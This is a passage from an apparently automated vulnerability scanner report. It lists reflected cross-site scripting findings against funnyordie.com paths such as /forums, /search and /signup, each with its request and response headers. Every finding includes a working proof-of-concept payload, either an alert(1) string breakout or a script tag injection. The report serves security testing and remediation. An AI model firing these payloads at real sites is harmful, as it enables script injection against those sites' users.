Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /caption_contests/da5caff1e8/caption-contest-for-nov-3-2010?f857b"-alert(1)-"259522f8ca9=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "ac2aa076c200cdad0013fe4ecbfbb95b"
X-Runtime: 540
X-Varnish: 1401143797
X-Varnish: 573927084
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1
Expires: Fri, 05 Nov 2010 05:30:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:30:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 241610
1.57. http://www.funnyordie.com/forums [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /forums
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8335d"><script>alert(1)</script>c94d9039450 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /forums?8335d"><script>alert(1)</script>c94d9039450=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "b811ab52855908f88221c569f1329cae"
X-Runtime: 204
X-Varnish: 1401128349
X-Varnish: 573907623
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2
Expires: Fri, 05 Nov 2010 05:13:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:13:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60864
1.58. http://www.funnyordie.com/forums [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /forums
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 578da'-alert(1)-'c7a64de13ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forums?578da'-alert(1)-'c7a64de13ac=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "54a0a71bab6eec3af8b34d41adeaf222"
X-Runtime: 505
X-Varnish: 1401129385
X-Varnish: 1264363628
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2
Expires: Fri, 05 Nov 2010 05:15:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:15:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60466
1.59. http://www.funnyordie.com/forums [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /forums
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71a0a"-alert(1)-"b067575346a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forums?71a0a"-alert(1)-"b067575346a=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "852717b9cec2bae87b793194702df372"
X-Runtime: 178
X-Varnish: 1401128879
X-Varnish: 1264363023
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2
Expires: Fri, 05 Nov 2010 05:14:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:14:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60492
1.60. http://www.funnyordie.com/lists/780f0caed2/the-next-career-moves-for-5-election-losers [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23869"-alert(1)-"5859a08b355 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lists/780f0caed2/the-next-career-moves-for-5-election-losers?23869"-alert(1)-"5859a08b355=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "b896569e03eb55c3633f932c7dfb1ef1"
X-Runtime: 199
X-Varnish: 1401142258
X-Varnish: 1264379002
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1
Expires: Fri, 05 Nov 2010 05:28:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:28:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 269953
1.61. http://www.funnyordie.com/lists/780f0caed2/the-next-career-moves-for-5-election-losers [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f124"><script>alert(1)</script>f1df45b38ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /lists/780f0caed2/the-next-career-moves-for-5-election-losers?6f124"><script>alert(1)</script>f1df45b38ec=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "980afde0b0d061d85f493bc39ce0e007"
X-Runtime: 550
X-Varnish: 1401140747
X-Varnish: 573923279
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3
Expires: Fri, 05 Nov 2010 05:27:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:27:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 270054
1.62. http://www.funnyordie.com/oembed [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /oembed
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c01d3"-alert(1)-"b428f5203da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /oembed?c01d3"-alert(1)-"b428f5203da=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 500 Internal Server Error
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 500 Internal Server Error
X-Varnish: 1401114140
Content-Length: 53424
X-Varnish: 573890344
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/(null)
Expires: Fri, 05 Nov 2010 04:59:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 04:59:25 GMT
Connection: close
1.63. http://www.funnyordie.com/oembed [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /oembed
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4dfde'-alert(1)-'89dd3d2cfcc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /oembed?4dfde'-alert(1)-'89dd3d2cfcc=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 500 Internal Server Error
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 500 Internal Server Error
X-Varnish: 1401114329
Content-Length: 53415
X-Varnish: 573890594
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/(null)
Expires: Fri, 05 Nov 2010 04:59:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 04:59:37 GMT
Connection: close
1.64. http://www.funnyordie.com/oembed [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /oembed
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d628"><script>alert(1)</script>0fd5b641e76 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /oembed?3d628"><script>alert(1)</script>0fd5b641e76=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 500 Internal Server Error
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 500 Internal Server Error
X-Varnish: 1401113908
Content-Length: 53757
X-Varnish: 573890015
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/(null)
Expires: Fri, 05 Nov 2010 04:59:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 04:59:12 GMT
Connection: close
1.65. http://www.funnyordie.com/promos/widgethq [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /promos/widgethq
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58692"><script>alert(1)</script>baa790cc643 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /promos/widgethq?58692"><script>alert(1)</script>baa790cc643=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "209d96b4c98751bdc5eb91349729c20d"
X-Runtime: 124
X-Varnish: 1401126424
X-Varnish: 1264360005
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1
Expires: Fri, 05 Nov 2010 05:11:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:11:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 82221
1.66. http://www.funnyordie.com/promos/widgethq [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /promos/widgethq
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a955'-alert(1)-'af71981e5b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /promos/widgethq?3a955'-alert(1)-'af71981e5b6=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "d0d7cbf45aa1484511d91ffd6b459337"
X-Runtime: 125
X-Varnish: 1401127234
X-Varnish: 573906184
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1
Expires: Fri, 05 Nov 2010 05:12:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:12:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 81848
1.67. http://www.funnyordie.com/promos/widgethq [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /promos/widgethq
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd84e"-alert(1)-"5b039ab1e13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /promos/widgethq?dd84e"-alert(1)-"5b039ab1e13=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "95a1a70ab696a83ed5397d30fd0fab10"
X-Runtime: 141
X-Varnish: 1401126825
X-Varnish: 1264360428
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2
Expires: Fri, 05 Nov 2010 05:12:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:12:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 81905
1.68. http://www.funnyordie.com/search/a [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /search/a
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5a57"><script>alert(1)</script>e7bcd741c1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/a?b5a57"><script>alert(1)</script>e7bcd741c1e=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "10624fc9c561b43e32ef3addf1ca1de0"
X-Runtime: 121
X-Varnish: 1401143779
X-Varnish: 573927064
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1
Expires: Fri, 05 Nov 2010 05:30:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:30:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 168489
1.69. http://www.funnyordie.com/search/a [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /search/a
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bbfc'-alert(1)-'224a1fbb6a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search/a?5bbfc'-alert(1)-'224a1fbb6a5=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "cb6838f9ef66bde08aa1abd77bbe5e29"
X-Runtime: 373
X-Varnish: 1401144922
X-Varnish: 1264381979
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3
Expires: Fri, 05 Nov 2010 05:31:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:31:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 167950
1.70. http://www.funnyordie.com/search/a [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /search/a
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 722e4"-alert(1)-"4dc3116555d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search/a?722e4"-alert(1)-"4dc3116555d=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "09dcc9a8c93e954af6e24b47a93fbd7a"
X-Runtime: 474
X-Varnish: 1401144256
X-Varnish: 573927530
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2
Expires: Fri, 05 Nov 2010 05:30:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:30:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 168008
1.71. http://www.funnyordie.com/search/a/images [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /search/a/images
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da8a4"><script>alert(1)</script>c8aa137f65c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/a/images?da8a4"><script>alert(1)</script>c8aa137f65c=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "9e0f168b52267c869dcb3a52e048e3e1"
X-Runtime: 96
X-Varnish: 1401145415
X-Varnish: 1264382569
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1
Expires: Fri, 05 Nov 2010 05:32:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:32:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 168604
1.72. http://www.funnyordie.com/search/a/images [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /search/a/images
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7024a"-alert(1)-"57c333d0375 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search/a/images?7024a"-alert(1)-"57c333d0375=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "cb356b6a7d039d06f032428c7fbf4fa0"
X-Runtime: 479
X-Varnish: 1401145972
X-Varnish: 573929667
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1
Expires: Fri, 05 Nov 2010 05:32:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:32:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 168077
1.73. http://www.funnyordie.com/search/a/images [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /search/a/images
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aca3c'-alert(1)-'42d49773b20 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search/a/images?aca3c'-alert(1)-'42d49773b20=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "4a0ba34ac3695abdf11cb1198bbf014e"
X-Runtime: 109
X-Varnish: 1401146440
X-Varnish: 573930185
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2
Expires: Fri, 05 Nov 2010 05:33:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:33:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 168055
1.74. http://www.funnyordie.com/search/a/users [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /search/a/users
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a907"-alert(1)-"aabb18c5a0e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search/a/users?6a907"-alert(1)-"aabb18c5a0e=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "18dc784d47949ba7b98714afaed548a0"
X-Runtime: 107
X-Varnish: 1401145352
X-Varnish: 573928841
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3
Expires: Fri, 05 Nov 2010 05:32:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:32:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 167760
1.75. http://www.funnyordie.com/search/a/users [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /search/a/users
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6862f'-alert(1)-'91a5b631bfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search/a/users?6862f'-alert(1)-'91a5b631bfe=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "49f34edc1333c0e32f7d3def3ac47a52"
X-Runtime: 116
X-Varnish: 1401146061
X-Varnish: 573929771
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1
Expires: Fri, 05 Nov 2010 05:32:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:32:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 167727
1.76. http://www.funnyordie.com/search/a/users [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /search/a/users
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4c47"><script>alert(1)</script>2e144e902db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/a/users?e4c47"><script>alert(1)</script>2e144e902db=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "bd9b81d3cfa909c49bcb27691c87a656"
X-Runtime: 127
X-Varnish: 1401145058
X-Varnish: 1264382126
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1
Expires: Fri, 05 Nov 2010 05:31:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:31:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 168211
1.77. http://www.funnyordie.com/signup [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /signup
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb53b'-alert(1)-'0578c16e051 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /signup?bb53b'-alert(1)-'0578c16e051=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "6a25b378033ecfa1bd097aa462bfaf21"
X-Runtime: 97
X-Varnish: 1401114402
X-Varnish: 573890704
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2
Expires: Fri, 05 Nov 2010 04:59:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 04:59:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 57008
1.78. http://www.funnyordie.com/signup [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /signup
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d885a"-alert(1)-"99624835e69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
